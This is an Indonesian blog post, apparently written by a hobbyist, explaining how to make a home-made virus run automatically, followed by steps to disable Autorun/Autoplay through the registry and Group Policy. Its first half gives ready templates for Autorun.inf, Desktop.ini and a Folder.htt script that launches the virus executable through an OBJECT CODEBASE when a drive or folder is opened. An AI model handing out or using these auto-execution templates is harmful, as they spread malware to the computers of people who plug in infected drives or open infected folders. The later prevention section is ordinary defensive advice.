Nah kemaren kita udah coba buat Viruz iseng...nah sekarang kita coba bagaimana viruz itu dapat berjalan tanpa disuruh...[inisiatif yg tinggi] hehehe....
Sebenarnya kita hanya perlu menambahkan program file yg dapat membuat file viruz itu dapat berjalan sendiri...seperti Autorun.inf, desktop.ini dengan folder.httt
Tapi teman tenang aja...kita bahas juga bagaimana pencegahannya...so...Lanjut....^^
- File Autorun.inf
[Autorun]
Shelexecute=%nama file induk virus yang akan dijalankan%
Atau
[AutoRun]
open=%file virus%
shellexecute=%file virus%
shell\Auto\command=%file virus%
shell=Auto
Gambar 1, Script Autorun.inf untuk menjalankan file Folder.exe
- Desktop.ini
Biasanya file Desktop.ini akan berpasangan dengan file .HTT [contohnya folder.htt] dibuat dengan tujuan untuk menjalankan script lain kemudian file script yang dijalankan tersebut mempunyai script lain untuk menjalankan file virus. Berikut contoh script yang akan dibuat oleh virus.
[.ShellClassInfo]
ConfirmFileOp=0
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=%lokasi file Folder.htt yang dibuat virus% [ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
Gambar 2, Script file Desktop.ini untuk menjalankan file folder.htt [file folder.htt ini sendiri akan berisi script untuk menjalankan file virus seperti terlihat pada gambar dibawah ini.]
- Folder.htt
<html>
<head>
<meta http-equiv=”content-type”content=”text/html; charset=Windows-1252″>
</head>
<body style=”margin: 0″ scroll=no>
<object id=FileList border=0 tabindex=1
classid= “clsid:1820FED0-473E-11D0-A96C-00C04FD705A2″
style=”width: 100; height: 100″ tabIndex=-1>
</object>
</body>
</html>
<script>
objectstr=”<OBJECT ID=\”RUNIT\” WIDTH=0 HEIGHT=0 TYPE=\”application/x-oleobject\””
objectstr+=”CODEBASE=\”%file virus yang akan dijalnkan% #version=1,1,1,1\”>”
objectstr+=”<PARAM NAME=\”_Version\” VALUE=\”65536\”>”
objectstr+=”</OBJECT>”
objectstr+=”<HTML><H1></H1></HTML>”;
document.writeln(objectstr);
document.close();
</script>
Gambar 3, Script Folder.htt akan menjalankan file New Folder.exe
Bagaimana Cara Menghadapinya ?
Salah satu cara yang efektif untuk mencegah penyebaran virus lokal yang menggunakan metode ini adalah dengan men-disable fungsi Autorun/Autoplay pada Drive/Removable tersebut.
Untuk Disable Autorun/Autoplay dapat menggunakan beberapa cara diantaranya : (jalankan hanya salah satu)
- Disable Autorun/Autoplay melalui registry, caranya:
§ Buka Registry Editor
Klik menu [Start | Run | pada dialog box RUN ketik regedit]
§ Browse ke alamat registry berikut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
§ Kemudian klik kanan pada string NoDriveTypeAutoRun
Gambar 4, Alamat registry yang harus diubah agar autorun tidak aktif
§ Isi value data dengan ff yang berarti fungsi Aturun/Autoply akan di matikan pada 255 drive
Gambar 5, Merubah value NoDriveTypeAutorun
§ Klik Tombol [OK]
§ Keluar dari “Registry Editor”
§ Restart komputer agar perubahan ini berjalan
- Disable Autorun/Autoplay melalui Group Policy [GPEDIT.MCS], caranya:
§ Klik menu [Start]
§ Klik [Run]
§ Ketik GPEDIT.MSC pada kolom “RUN”
§ Setelah muncul layar “Group Policy” klik folder “System” pada menu “User Configuration” dan “Computer Configuration”
§ Pada kolom Settings, klik dua kali “Turn off Autoplay”
Gambar 6, Interface Group Policy “User Configuration”
Gambar 7, Interface Group Policy “Computer Configuration”
§ Setelah muncul layar “Turn off Autoplay” properties, klik tabulasi [Settings] dan pilih opsi “Enable” pada menu “Turn off Autoplay” kemudian Pilih “All Drive” pada kolom “Turn off Autoplay on”
Gambar 8, Mematikan Autoplay dengan menggunaakn Group Policy
o Kemudian klik tombol “OK”
Gambar 9, Disable Autoplay
Lalu Klik close...dan untuk lebih sempurna dan perintahnya benar2 dijalankan...kamu coba untuk Log out lalu Log in lagi....
Nah begitulah kira-kira pencegahannya....n jangan lupa juga untuk selalu update AV milik kamu...karena teknologi selalu berkembang...mungkin akan ada penularan melalui media lain seperti Internet...so, tetap waspada n jangan terlalu paranoid terhadap viruz....
Stay cool n Enjoy....^^
NS : http://hari.000webhost.info
0 komentar:
Posting Komentar